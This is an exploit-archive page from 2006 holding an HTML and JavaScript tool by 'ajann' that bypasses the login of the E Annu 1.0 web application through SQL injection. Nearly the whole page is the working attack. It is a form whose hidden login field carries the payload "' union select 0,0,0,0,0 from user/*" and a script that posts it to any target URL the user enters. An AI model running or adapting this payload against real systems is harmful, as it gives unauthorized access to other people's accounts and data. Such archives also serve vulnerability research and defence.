[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : E Annu 1.0 Login Bypass SQL Injection Exploit
# Published : 2006-10-30
# Author : ajann
# Previous Title : phpBB Spider Friendly Module <= 1.3.10 File Include Exploit
# Next Title : phpProfiles 2.1 Beta Multiple Remote File Include Vulnerabilities


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>E Annu 1.0 Login Bypass SQL Injection Exploit</title>

<script language="JavaScript">
 
//'===============================================================================================
//'[Script Name: E Annu 1.0 Login Bypass SQL Injection Exploit
//'[Coded by   : ajann
//'[Author   : ajann
//'[Contact    : :(
//'[Using : Write Target after Submit Click
//'===============================================================================================
   

     //Basic exploit,but any time : ( 

function command(){
       if (document.sql.login.value==""){
          alert("Failed..");
      return false;
    }


  
  sql.action= document.sql.target1.value // Ready Target : )
  sql.submit(); // Form Submit
   }
</script>

</head>

<body bgcolor="#000000">
<center>
<p><b><font face="Verdana" size="2" color="#008000">E Annu 1.0 Login Bypass SQL Injection</font></b></p>
<p></p>
<form method="post" name="sql" onSubmit="command();">
    <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[scriptpath]</font><font color="#00FF00" size="2" face="Arial">
  </font><font color="#FF0000" size="2">&nbsp;</font></b>

  <input type="hidden" name="login" value="' union select 0,0,0,0,0 from user/*" onmouseout="javascript:this.style.background='#808000';"></p>
<input type="hidden" name="password">
<input type="hidden" name="action_connect">
<br>
 <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">

  <p><input type="submit" value="G?nder" name="B1"><input type="reset" value="Sifirla" name="B2"></p>
</form>
<p><br>
</p>
<b><font face="Verdana" size="2" color="#008000">ajann</font></b></p>
</center>
</body>

</html>

# www.Syue.com [2006-10-30]